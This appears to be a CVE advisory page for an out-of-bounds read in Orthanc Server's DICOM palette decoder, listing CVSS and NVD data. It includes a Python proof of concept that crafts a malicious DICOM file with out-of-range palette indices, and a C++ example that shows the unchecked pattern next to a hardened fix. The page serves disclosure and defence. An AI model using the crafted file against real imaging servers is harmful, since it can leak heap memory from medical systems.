Security Vulnerability Report
CVE-2026-5445 CVSS 9.1 CRITICAL

CVE-2026-5445

Published: 2026-04-09 15:16:17
Last Modified: 2026-04-14 20:10:01

Description

An out-of-bounds read vulnerability exists in the `DecodeLookupTable` function within `DicomImageDecoder.cpp`. The lookup-table decoding logic used for `PALETTE COLOR` images does not validate pixel indices against the lookup table size. Crafted images containing indices larger than the palette size cause the decoder to read beyond allocated lookup table memory and expose heap contents in the output image.
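As an added illustration of the defect class the description names (this is not Orthanc's code; `PaletteLut`, `DecodeUnchecked`, `DecodePaletteColor` and `FirstOutOfRangeIndex` are hypothetical names), the C++ below places the unchecked lookup pattern next to a hardened decoder that validates every pixel index against the palette size before indexing, and includes the DICOM descriptor rule that an entry count of 0 means 65536 entries. The palette and pixel indices are constructed inline to mirror the 2-entry palette and 0xFF indices used by the PoC on this page.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical palette representation (not Orthanc's own types): one 16-bit
// value per palette index for each of the three colour channels.
struct PaletteLut {
    std::vector<uint16_t> red;
    std::vector<uint16_t> green;
    std::vector<uint16_t> blue;
    size_t Entries() const { return red.size(); }
};

// DICOM PS3.3 C.7.6.3.1.5: the first value of a Palette Color Lookup Table
// Descriptor is the number of entries, and a value of 0 means 65536 entries.
size_t LutEntriesFromDescriptor(uint16_t firstDescriptorValue) {
    return firstDescriptorValue == 0 ? 65536u : firstDescriptorValue;
}

// Vulnerable pattern (illustration only, never called here): the pixel value
// is used directly as a table index, so any index >= Entries() reads past the
// end of the table buffer. This is the defect class CVE-2026-5445 describes.
void DecodeUnchecked(const std::vector<uint16_t>& indices,
                     const PaletteLut& lut, std::vector<uint16_t>& rgbOut) {
    rgbOut.clear();
    for (uint16_t idx : indices) {
        rgbOut.push_back(lut.red[idx]);    // no comparison against lut.Entries()
        rgbOut.push_back(lut.green[idx]);
        rgbOut.push_back(lut.blue[idx]);
    }
}

// Returns the position of the first pixel whose index lies outside the
// palette, or -1 if every index is valid. Usable as a pre-decode check.
long FirstOutOfRangeIndex(const std::vector<uint16_t>& indices, size_t lutEntries) {
    for (size_t i = 0; i < indices.size(); ++i) {
        if (indices[i] >= lutEntries) return static_cast<long>(i);
    }
    return -1;
}

// Hardened decoder: rejects the whole image if the three channel tables do
// not agree in size or if any index is out of range, so nothing beyond the
// table is ever read and rgbOut is left empty on failure.
bool DecodePaletteColor(const std::vector<uint16_t>& indices,
                        const PaletteLut& lut, std::vector<uint16_t>& rgbOut) {
    rgbOut.clear();
    const size_t n = lut.Entries();
    if (n == 0 || lut.green.size() != n || lut.blue.size() != n) return false;
    if (FirstOutOfRangeIndex(indices, n) != -1) return false;
    rgbOut.reserve(indices.size() * 3);
    for (uint16_t idx : indices) {
        rgbOut.push_back(lut.red[idx]);
        rgbOut.push_back(lut.green[idx]);
        rgbOut.push_back(lut.blue[idx]);
    }
    return true;
}

int main() {
    // Constructed sample: a 2-entry palette (0x0000, 0xFFFF per channel) and a
    // 10x10 image whose every pixel index is 0xFF, as in the PoC on this page.
    PaletteLut lut{{0x0000, 0xFFFF}, {0x0000, 0xFFFF}, {0x0000, 0xFFFF}};
    std::vector<uint16_t> crafted(100, 0xFF);
    std::vector<uint16_t> out;
    bool ok = DecodePaletteColor(crafted, lut, out);   // false: image rejected
    return ok ? 1 : 0;
}
```

The check is deliberately all-or-nothing: rejecting the image at the first bad index is simpler to reason about than clamping, and it also gives a decoder a single place to log the offending pixel position for detection purposes.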

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:* - VULNERABLE
Orthanc Server (see the official security advisory for the specific affected versions; the NVD record below lists versions before 1.12.11 as affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import pydicom
from pydicom.dataset import Dataset, FileMetaDataset

# Simulate creating a malicious DICOM file structure
# This is a conceptual PoC to demonstrate the vulnerability trigger logic.
# In a real scenario, one would need to craft a valid DICOM file with
# specific tags that trigger the DecodeLookupTable path.


def create_malicious_dicom(filename):
    # Create a minimal File Meta Information
    file_meta = FileMetaDataset()
    file_meta.TransferSyntaxUID = '1.2.840.10008.1.2'  # Implicit VR Little Endian
    file_meta.MediaStorageSOPClassUID = '1.2.840.10008.5.1.4.1.1.7'  # Secondary Capture Image Storage
    file_meta.MediaStorageSOPInstanceUID = '1.2.3.4.5'
    file_meta.ImplementationClassUID = '1.2.3.4'

    # Create the Dataset and attach the file meta information
    ds = Dataset()
    ds.file_meta = file_meta
    ds.is_little_endian = True   # encoding flags pydicom needs to write Implicit VR LE
    ds.is_implicit_VR = True
    ds.SOPClassUID = '1.2.840.10008.5.1.4.1.1.7'
    ds.SOPInstanceUID = '1.2.3.4.5'

    # Set image attributes to trigger PALETTE COLOR decoding
    ds.SamplesPerPixel = 1
    ds.PhotometricInterpretation = 'PALETTE COLOR'
    ds.BitsAllocated = 8
    ds.BitsStored = 8
    ds.HighBit = 7
    ds.PixelRepresentation = 0
    ds.Rows = 10
    ds.Columns = 10

    # Create a Palette with a small size (e.g., 2 colors)
    # Descriptor = (number of entries, first pixel value mapped, bits per entry)
    # Red, Green, Blue lookup tables
    ds.RedPaletteColorLookupTableDescriptor = [2, 0, 16]  # 2 entries, 16 bits
    ds.GreenPaletteColorLookupTableDescriptor = [2, 0, 16]
    ds.BluePaletteColorLookupTableDescriptor = [2, 0, 16]

    # Dummy palette data: two 16-bit entries (0x0000 and 0xFFFF) per channel
    ds.RedPaletteColorLookupTableData = b'\x00\x00\xFF\xFF'
    ds.GreenPaletteColorLookupTableData = b'\x00\x00\xFF\xFF'
    ds.BluePaletteColorLookupTableData = b'\x00\x00\xFF\xFF'

    # Pixel Data: Contains indices that exceed the palette size (e.g., 255)
    # The palette size is 2, so valid indices are 0 and 1. 255 is out of bounds.
    malicious_pixel_data = b'\xFF' * (10 * 10)
    ds.PixelData = malicious_pixel_data

    # Save the file
    ds.save_as(filename)
    print(f"Malicious DICOM file created: {filename}")


if __name__ == "__main__":
    create_malicious_dicom('malicious.dcm')
    # When this file is processed by a vulnerable Orthanc Server instance,
    # it will attempt to access index 255 in a palette of size 2,
    # causing an out-of-bounds read.
```

References

https://kb.cert.org/vuls/id/536588 (Third Party Advisory, VDB Entry)
https://www.machinespirits.de/ (Not Applicable)
https://www.orthanc-server.com/ (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-5445",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T15:16:16.863",
    "lastModified": "2026-04-14T20:10:01.390",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An out-of-bounds read vulnerability exists in the `DecodeLookupTable` function within `DicomImageDecoder.cpp`. The lookup-table decoding logic used for `PALETTE COLOR` images does not validate pixel indices against the lookup table size. Crafted images containing indices larger than the palette size cause the decoder to read beyond allocated lookup table memory and expose heap contents in the output image."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-125"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.12.11",
                "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://kb.cert.org/vuls/id/536588", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]},
      {"url": "https://www.machinespirits.de/", "source": "[email protected]", "tags": ["Not Applicable"]},
      {"url": "https://www.orthanc-server.com/", "source": "[email protected]", "tags": ["Product"]}
    ]
  }
}
```